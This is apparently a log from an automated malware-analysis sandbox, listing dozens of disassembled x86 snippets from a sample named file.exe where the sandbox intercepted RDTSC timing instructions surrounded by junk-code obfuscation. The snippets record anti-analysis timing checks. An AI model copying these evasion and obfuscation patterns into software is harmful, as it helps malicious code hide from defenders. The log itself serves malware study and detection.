Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11311C6 second address: 1131249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F5E907EB789h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F5E907EB778h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push ecx 0x00000029 mov edi, 47B9B768h 0x0000002e pop edi 0x0000002f mov dword ptr [ebp+122D2592h], ebx 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D380Eh] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007F5E907EB778h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000015h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d jng 00007F5E907EB776h 0x00000063 pushad 0x00000064 popad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11344DC second address: 11344E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D7625 second address: 10D762B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D762B second address: 10D762F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D762F second address: 10D7635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D7635 second address: 10D7639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10D7639 second address: 10D763D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1134B22 second address: 1134B28 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1134B28 second address: 1134B32 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5E907EB77Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1131489 second address: 11314B1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E9072B89Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F5E9072B8A5h 0x00000013 jmp 00007F5E9072B89Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1136B86 second address: 1136B97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB77Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1136B97 second address: 1136C30 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E9072B89Ch 0x00000008 jng 00007F5E9072B896h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov dword ptr [ebp+1247A042h], esi 0x00000019 jmp 00007F5E9072B89Fh 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push esi 0x00000023 call 00007F5E9072B898h 0x00000028 pop esi 0x00000029 mov dword ptr [esp+04h], esi 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc esi 0x00000036 push esi 0x00000037 ret 0x00000038 pop esi 0x00000039 ret 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007F5E9072B898h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Ah 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 mov di, cx 0x00000059 xchg eax, esi 0x0000005a jnc 00007F5E9072B8A4h 0x00000060 push eax 0x00000061 pushad 0x00000062 jmp 00007F5E9072B89Ah 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137C4D second address: 1137C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137C53 second address: 1137C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1136E0B second address: 1136E18 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E907EB776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1136E18 second address: 1136E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138C64 second address: 1138C68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1138C68 second address: 1138CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, 618B6F38h 0x0000000f push 00000000h 0x00000011 mov bx, di 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F5E9072B898h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D34F6h] 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push ebx 0x0000003b pop ebx 0x0000003c jnl 00007F5E9072B896h 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137E0C second address: 1137E23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E907EB783h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137E23 second address: 1137E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137E27 second address: 1137E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jo 00007F5E907EB782h 0x00000010 jmp 00007F5E907EB77Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5E907EB784h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11421BB second address: 11421D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E9072B8A3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11421D2 second address: 1142209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB786h 0x00000007 push esi 0x00000008 jmp 00007F5E907EB785h 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1142209 second address: 1142223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5E9072B896h 0x0000000a jmp 00007F5E9072B89Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1142223 second address: 114223F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5E907EB785h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11419F3 second address: 11419F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11419F9 second address: 11419FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11419FD second address: 1141A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1141A01 second address: 1141A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5E907EB787h 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1141A29 second address: 1141A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1141A2F second address: 1141A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1141D24 second address: 1141D3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B8A4h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1141D3E second address: 1141D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F5E907EB782h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1141D56 second address: 1141D5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114727C second address: 1147281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114BCE4 second address: 114BCEF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114AAF9 second address: 114AB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E907EB77Eh 0x00000009 popad 0x0000000a jns 00007F5E907EB782h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114AB1E second address: 114AB57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B8A1h 0x00000007 jmp 00007F5E9072B89Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5E9072B8A4h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114AB57 second address: 114AB5D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114AB5D second address: 114AB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B71D second address: 114B723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B723 second address: 114B745 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F5E9072B8A4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B745 second address: 114B749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B749 second address: 114B759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5E9072B896h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B759 second address: 114B75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B75F second address: 114B76D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B76D second address: 114B771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B8F5 second address: 114B8F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114BA54 second address: 114BA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5E907EB776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114BB88 second address: 114BB8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114BB8E second address: 114BBA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E907EB77Fh 0x00000009 popad 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114BBA6 second address: 114BBD5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E9072B89Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jnp 00007F5E9072B896h 0x0000001c push edi 0x0000001d pop edi 0x0000001e popad 0x0000001f jno 00007F5E9072B89Ah 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114BBD5 second address: 114BBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114BBD9 second address: 114BBDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114BBDD second address: 114BBE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114FEE6 second address: 114FF12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007F5E9072B896h 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007F5E9072B896h 0x00000011 jmp 00007F5E9072B8A3h 0x00000016 jnc 00007F5E9072B896h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1150650 second address: 1150682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jno 00007F5E907EB776h 0x0000000f popad 0x00000010 pop edx 0x00000011 pushad 0x00000012 jo 00007F5E907EB78Dh 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a jmp 00007F5E907EB785h 0x0000001f push esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1150682 second address: 1150688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114FC30 second address: 114FC36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114FC36 second address: 114FC3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1150946 second address: 115097F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F5E907EB781h 0x0000000a jmp 00007F5E907EB77Ah 0x0000000f jmp 00007F5E907EB786h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115097F second address: 115098B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5E9072B89Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115098B second address: 115099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5E907EB77Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115099B second address: 11509B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F5E9072B896h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11509B0 second address: 11509B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11554A1 second address: 11554BC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5E9072B896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5E9072B89Ah 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11543E2 second address: 11543EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5E907EB776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1124A70 second address: 1124A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1124A76 second address: 1124A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E907EB785h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1124A8F second address: 1124A93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1124A93 second address: 110070D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor dh, FFFFFFC7h 0x0000000e call dword ptr [ebp+122D2711h] 0x00000014 jmp 00007F5E907EB77Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F5E907EB780h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1124F59 second address: 1124F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1124F5D second address: 1124F61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1124F61 second address: 1124FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 add dword ptr [esp], 192F687Fh 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F5E9072B898h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push D65CFEB3h 0x0000002d pushad 0x0000002e jmp 00007F5E9072B8A1h 0x00000033 push edi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11251F9 second address: 11251FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11251FD second address: 1125212 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5E9072B896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125212 second address: 1125216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125216 second address: 112521C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112521C second address: 1125226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F5E907EB776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125AB1 second address: 1125ABB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5E9072B896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125ABB second address: 1125B2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB77Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jg 00007F5E907EB776h 0x00000014 popad 0x00000015 jc 00007F5E907EB77Ch 0x0000001b jns 00007F5E907EB776h 0x00000021 popad 0x00000022 mov eax, dword ptr [esp+04h] 0x00000026 jmp 00007F5E907EB780h 0x0000002b mov eax, dword ptr [eax] 0x0000002d push ebx 0x0000002e pushad 0x0000002f jns 00007F5E907EB776h 0x00000035 jns 00007F5E907EB776h 0x0000003b popad 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 push edi 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F5E907EB788h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125B84 second address: 1125BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b mov di, ax 0x0000000e lea eax, dword ptr [ebp+1248973Eh] 0x00000014 sub ecx, 612B9E3Bh 0x0000001a push eax 0x0000001b pushad 0x0000001c push ebx 0x0000001d jnc 00007F5E9072B896h 0x00000023 pop ebx 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1125BAB second address: 1125C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F5E907EB778h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 jmp 00007F5E907EB789h 0x00000028 pushad 0x00000029 jng 00007F5E907EB786h 0x0000002f jmp 00007F5E907EB780h 0x00000034 jmp 00007F5E907EB784h 0x00000039 popad 0x0000003a lea eax, dword ptr [ebp+124896FAh] 0x00000040 push 00000000h 0x00000042 push edi 0x00000043 call 00007F5E907EB778h 0x00000048 pop edi 0x00000049 mov dword ptr [esp+04h], edi 0x0000004d add dword ptr [esp+04h], 00000016h 0x00000055 inc edi 0x00000056 push edi 0x00000057 ret 0x00000058 pop edi 0x00000059 ret 0x0000005a nop 0x0000005b jmp 00007F5E907EB786h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F5E907EB77Ch 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115469A second address: 115469E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115469E second address: 11546A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
